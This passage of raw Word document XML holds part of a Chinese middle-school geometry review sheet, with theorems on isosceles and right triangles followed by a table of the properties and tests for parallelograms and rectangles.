          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）若一个图形是轴对称图形</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>则图形上的任何一对对应点所连线段都会被同一条直线垂直平分。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、等腰三角形中的有关公理、定理：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）等腰三角形的两个底角相等。（简写成“等边对等角”）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）如果一个三角形有两个角相等，那么这两个角所对的边也相等。（简写成“等角对等边”）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）等腰三角形的“三线合一”定理：等腰三角形的顶角平分线、底边上的中线和底边上的高互相重合，简称“三线合一”。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）等边三角形的各个内角都相等，并且每一个内角都等于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>60</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>°。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）三个角都相等的三角形是等边三角形。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）有一个角是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>60</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>°的等腰三角形是等边三角形。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、直角三角形的有关公理、定理：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）直角三形的两个锐角互余；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）勾股定理：直角三角形两直角边的平方和等于斜边的平方；</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）勾股定理逆定理：如果一个三角形的一条边的平方等于另外两条边的平方和，那么这个三角形是直角三角形。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）直角三角形斜边上的中线等于斜边的一半。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）在直角三角形中，如果一个锐角等于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>°，那么它所对的直角边等于斜边的一半。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="0057606C" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r w:rsidRPr="0057606C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>特殊四边形</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、特殊四边形的有关性质、判定：</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3211"/>
        <w:gridCol w:w="3686"/>
        <w:gridCol w:w="1134"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidTr="00E44832">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1008" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>图形</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3211" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>性质</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>判定</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>对称性</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidTr="00E44832">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1008" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>平行</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>四边形</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3211" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>①对边平行且相等；</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>②对角相等；</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>③对角线互相平分。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>①两组对边分别平行的四边</w:t>
            </w:r>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>形；</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>②两组对边分别相等的四边形；</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>③一组对边平行且相等的四边形；</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>④两组对角分别相等的四边形；</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>⑤对角线互相平分的四边形。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>中心对</w:t>
            </w:r>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidTr="00E44832">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1008" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>矩形</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3211" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>①对边平行且相等；</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>②四个角都相等都是直角；</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>③对角线互相平分且相等。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3686" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>①有一个角是直角的平行四边形；</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>②有三个角是直角的四边形；</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>③对角线相等的平行四边形。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>轴对称</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>中心对称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidTr="00E44832">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1008" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00D35B85" w:rsidRPr="00832462" w:rsidRDefault="00D35B85" w:rsidP="00E44832">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00832462">
              <w:rPr>
